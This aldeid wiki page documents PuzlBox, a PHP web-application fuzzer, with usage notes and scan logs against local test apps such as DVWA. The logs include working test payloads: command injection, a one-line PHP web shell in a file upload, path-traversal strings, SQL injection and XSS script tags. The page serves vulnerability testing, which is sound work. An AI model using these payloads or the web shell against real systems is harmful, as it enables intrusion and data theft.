Puzlbox

From aldeid
Jump to: navigation, search

Description

PuzlBox is a PHP fuzzing tool written by John Leitch. It scans for several different vulnerabilities by performing dynamic program analysis. Following tests are currently performed:

  • Arbitrary Command Execution
  • Arbitrary File Read/Write/Change/Rename/Delete
  • Local File Inclusion (LFI)
  • Arbitrary PHP Execution
  • SQL Injection
  • Reflected Cross-site Scripting (XSS)

For each test, specific payloads (forged requests) are sent to the web application and responses from the server are analyzed. Depending on the results (HTTP response code, errors, ...), the test will be interpreted as positive (discovery of a potential vulnerability) or negative. All positives tests appear in the generated reports with sent payloads.

Installation

  • Puzlbox is available here:

http://downloads.sourceforge.net/project/puzlbox1/puzlbox1022.zip

Info.png
Note
If the link doesn't work, you can find it here: http://dl.dropbox.com/u/10761700/puzlbox.tar.gz
  • Download, and unzip in C:\puzlbox\

Usage

Syntax

puzlbox [-s Server (default localhost)] [-m Scan Modes (default CFLPSX)]
[Absolute Web Root] [-n No Unhook] [Application Paths (comma delimited)]
Info.png
Note
The -s parameter seems not to work properly (tested on a Windows XP box).

Modes

Following modes are currently available:

  • C - Arbitrary Command Execution
  • F - Arbitrary File Read/Write/Change/Rename/Delete
  • L - Local File Inclusion
  • P - Arbitrary PHP Execution
  • S - SQL Injection
  • X - Reflected Cross-site Scripting

Refer to the examples section for details.

Info.png
Note
Notice that without -m (mode) specified, all tests will be performed.

Running puzlbox

For PuzlBox to successfully run the following conditions must be met:

  • PuzlBox must be run as administrator!
  • The targeted web application must not be accessed while PuzlBox is running!
  • Only one instance of PuzlBox per web root folder can be running at any time!

Reports

Two types of reports are generated:

  • Scan Overview Report: All concerned fields with payloads will be reported in this report. You will will find what fields are potentially vulnerable to each attack.
  • Vulnerability Report: If a vulnerability is confirmed, the complete payload with response will be reported in this report.

Examples

Environment

Full tests have been performed against various specific PHP applications to confirm all vulnerabilities. Environments include:

Damn Vulnerable Web Application (DVWA) http://downloads.sourceforge.net/project/dvwa/DVWA-1.0.7.zip
PoC to test SQL injections and Reflected Cross-site Scripting (XSS) http://dl.dropbox.com/u/10761700/poc-sql-injection.rar
PoC to test Code Injection http://dl.dropbox.com/u/10761700/poc-command-injection.rar
PoC to test Local File Inclusion (LFI) http://dl.dropbox.com/u/10761700/poc-local-file-inclusion.rar

Arbitrary Command Injection

The -m C parameter enables to challenge the application against arbitrary command injections tests. Its sends the string "C:\WINDOWS\system32\calc.exe" to form fields. Here the logs of puzlbox performed against a vulnerable application.

C:\puzlbox> puzlbox.exe -m C c:\web command-injection

produces:

----------------------------------------------------------------
Command Execution Scan
----------------------------------------------------------------
/command-injection/index.php
  $_GET
    cmd = C:\WINDOWS\system32\calc.exe
/command-injection/index.php
  $_GET
    cmd = C:\WINDOWS\system32\calc.exe 

And here the alert, confirming the vulnerability:

Alert Name: Command Execution
POST /command-injection/index.php?cmd=C%3a%5cWINDOWS%5csystem32%5ccalc.exe HTTP/1.1 
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Arbitrary File Read/Write/Change/Rename/Delete

The -m F parameter enables to challenge the web application against various HTTP methods (red, write, change, rename, delete).

C:\puzlbox> puzlbox.exe -m F c:\web dvwa

Produces following results (extract):

----------------------------------------------------------------
Aribtray File Read/Write/Change/Rename/Delete Scan
----------------------------------------------------------------
/dvwa/about.php
/dvwa/ids_log.php
/dvwa/index.php
/dvwa/instructions.php
/dvwa/login.php
  $_POST
    Login = shell.php
    username = shell.php
    password = shell.php
/dvwa/logout.php
/dvwa/phpinfo.php
/dvwa/security.php
/dvwa/setup.php
  $_POST
    create_db = shell.php
/dvwa/vulnerabilities/view_help.php
[...TRUNCATED...]

On the other hand, a vulnerability has been confirmed:

Alert Name: Arbitrary File Upload
POST /dvwa/vulnerabilities/upload/source/low.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 262
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="Upload"

shell.php
------x
Content-Disposition: form-data; name="uploaded"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
------x--


HTTP/1.1 200 OK
Date: Mon, 03 Jan 2011 07:52:33 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 526
Content-Type: text/html

<br />
<b>Warning</b>:  move_uploaded_file(DVWA_WEB_PAGE_TO_ROOThackable/uploads/shell.php) [<a href='function.move-uploaded-file'>function.move-uploaded-file</a>]: failed to open stream: No such file or directory in <b>C:\web\fern.php</b> on line <b>10</b><br />
<br />
<b>Warning</b>:  move_uploaded_file() [<a href='function.move-uploaded-file'>function.move-uploaded-file</a>]: Unable to move 'C:\xampp\tmp\php473.tmp' to 'DVWA_WEB_PAGE_TO_ROOThackable/uploads/shell.php' in <b>C:\web\fern.php</b> on line <b>10</b><br />

----------------------------------------------------------------

Local File Inclusion

The -m L parameter enables to challenge the application against Local File Inclusions (LFI) tests. The following command has been tested against a vulnerable application.

puzlbox.exe -m L c:\web local-file-inclusion

Produces following results (extract):

----------------------------------------------------------------
Local File Inclusion Scan
----------------------------------------------------------------
/local-file-inclusion/index.php
  $_GET
    page = ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt
/local-file-inclusion/index.php
  $_GET
    page = ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Flfi_test.txt
/local-file-inclusion/index.php
  $_GET
    page = ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt%00

Here the evidence of the vulnerability:

Alert Name: Local File Inclusion
POST /local-file-inclusion/index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Mon, 03 Jan 2011 14:33:28 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 393
Content-Type: text/html

<html>
<head>
<title>Local File Inclusion</title>
</head>
<body>

<form name="form1" method="get" action="index.php">
Select a page to load:
<select name="page" onchange="document.form1.submit();">
  <option value="page1.txt">page 1</option>
  <option value="page2.txt">page 2</option>
  <option value="page3.txt">page 3</option>
</select>
</form>

LFI_Test123
</body>
</html>
----------------------------------------------------------------

Arbitrary PHP Execution

The -m P parameter enables to challenge the application against arbitrary PHP execution tests. Its sends the following content to form fields: <?php echo 'testa'.'testb'; ?> with and without PHP tags.

puzlbox.exe -m P c:\web dvwa

Produces following results (extract):

----------------------------------------------------------------
Arbitrary PHP Execution Scan
----------------------------------------------------------------
/dvwa/about.php
/dvwa/ids_log.php
/dvwa/index.php
/dvwa/instructions.php
/dvwa/login.php
  $_POST
    Login = <?php echo 'testa'.'testb'; ?>
    username = <?php echo 'testa'.'testb'; ?>
    password = <?php echo 'testa'.'testb'; ?>
/dvwa/logout.php
/dvwa/phpinfo.php
/dvwa/security.php
/dvwa/setup.php
  $_POST
    create_db = <?php echo 'testa'.'testb'; ?>
/dvwa/vulnerabilities/view_help.php
[...TRUNCATED...]

SQL Injection

The -m S parameter enables to challenge the application against SQL injections tests. Tests have been run against a vulnerable index.php page that connects to a user table.

puzlbox.exe -m S c:\web sqlinj

Produces following results (extract):

----------------------------------------------------------------
SQL Injection Scan
----------------------------------------------------------------
/sqlinj/index.php
  $_POST
    username = ';--";--
    password = ';--";--
/sqlinj/index.php
  $_POST
    username = \';--\";--
    password = \';--\";--
    id = \';--\";--
/sqlinj/index.php
  $_POST
    username = \\';--\\";--
    password = \\';--\\";--
[...TRUNCATED...]

Vulnerabilities have been confirmed:

Alert Name: Potential SQL Injection
POST /sqlinj/index.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 147
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="username"

';--";--
------x
Content-Disposition: form-data; name="id"

';--";--
------x--


HTTP/1.1 200 OK
Date: Mon, 03 Jan 2011 08:39:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 1589
Content-Type: text/html

<html>
<head><title>HACKING</title></head>
<body>

<div style="float:left">
<fieldset>
  <legend>Select from ID</legend>
  <form method="POST" action="index.php">
    Enter ID: <input type="text" name="id" />
    <input type="submit" value="Go" />
  </form>
</fieldset>
</div>
<div style="float:left">
<fieldset>
  <legend>Create user</legend>
  <form method="POST" action="index.php">
    <div>USERNAME: <input type="text" name="username" /></div>
    <div>PASSWORD: <input type="text" name="password" /></div>                                       
    <div><input type="submit" value="Go" /></div>                                                    
  </form>                                                                                            
</fieldset>                                                                                          
</div>                                                                                               
<div style="clear:both"></div>                                                                       
<hr />                                                                                               
                                                                                                     
<div style="font-weight:bold;color:#ff0000;border:solid 2px #ff0000;">select id, username, password from user where id=';--";--</div>SQL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ;--";--' at line 1
----------------------------------------------------------------

Alert Name: Potential SQL Injection
POST /sqlinj/index.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 217
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="username"

';--";--
------x
Content-Disposition: form-data; name="password"

';--";--
------x
Content-Disposition: form-data; name="id"

';--";--
------x--


HTTP/1.1 200 OK
Date: Mon, 03 Jan 2011 08:39:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 1468
Content-Type: text/html

<html>
<head><title>HACKING</title></head>
<body>

<div style="float:left">
<fieldset>
  <legend>Select from ID</legend>
  <form method="POST" action="index.php">
    Enter ID: <input type="text" name="id" />
    <input type="submit" value="Go" />
  </form>
</fieldset>
</div>
<div style="float:left">
<fieldset>
  <legend>Create user</legend>
  <form method="POST" action="index.php">
    <div>USERNAME: <input type="text" name="username" /></div>
    <div>PASSWORD: <input type="text" name="password" /></div>                                       
    <div><input type="submit" value="Go" /></div>                                                    
  </form>                                                                                            
</fieldset>                                                                                          
</div>                                                                                               
<div style="clear:both"></div>                                                                       
<hr />                                                                                               
                                                                                                     
SQL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';--";--',;--";--')' at line 1
----------------------------------------------------------------
[...TRUNCATED...]

Reflected Cross-site Scripting

The -m X parameter enables to challenge the application against Reflected Cross-site Scripting (XSS) tests. The following has been tested against a vulnerable application (the same used for SQL injections).

C:\puzlbox> puzlbox.exe -m X c:\web sql-injection

Produces following results:

----------------------------------------------------------------
Reflected Cross-site Scripting Scan
----------------------------------------------------------------
/sql-injection/index.php
  $_GET
    id = 2<script>alert(0)</script>
/sql-injection/upload/cmd.php
  $_GET
    cmd = 7<script>alert(0)</script>
/sql-injection/index.php
  $_GET
    id = 5 <script>alert(0)</script>
/sql-injection/upload/cmd.php
  $_GET
    cmd = 9 <script>alert(0)</script>

And here the evidences of the vulnerability (extract):

Alert Name: Reflected XSS
GET /sql-injection/index.php?id=1%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 04:52:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 568
Content-Type: text/html

<html>
<head><title>HACKING</title></head>
<body>

<fieldset>
  <legend>Select from ID</legend>
  <form method="GET" action="index.php">
    Enter ID: <input type="text" name="id" />
    <input type="submit" value="Go" />
  </form>
</fieldset>
<hr />

<div style="font-weight:bold;color:#ff0000;border:solid 2px #ff0000;">select id, username, password from user where id=1<script>alert(0)</script></div>SQL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/script>' at line 1
----------------------------------------------------------------

Alert Name: Reflected XSS
GET /sql-injection/index.php?id=2%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 04:52:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 568
Content-Type: text/html

<html>
<head><title>HACKING</title></head>
<body>

<fieldset>
  <legend>Select from ID</legend>
  <form method="GET" action="index.php">
    Enter ID: <input type="text" name="id" />
    <input type="submit" value="Go" />
  </form>
</fieldset>
<hr />

<div style="font-weight:bold;color:#ff0000;border:solid 2px #ff0000;">select id, username, password from user where id=2<script>alert(0)</script></div>SQL ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/script>' at line 1
----------------------------------------------------------------
Info.png
Note
After some tests around this test (-m X), it seems that Puzlbox is only checking forms using the GET method (forms using POST method are not checked).

Comments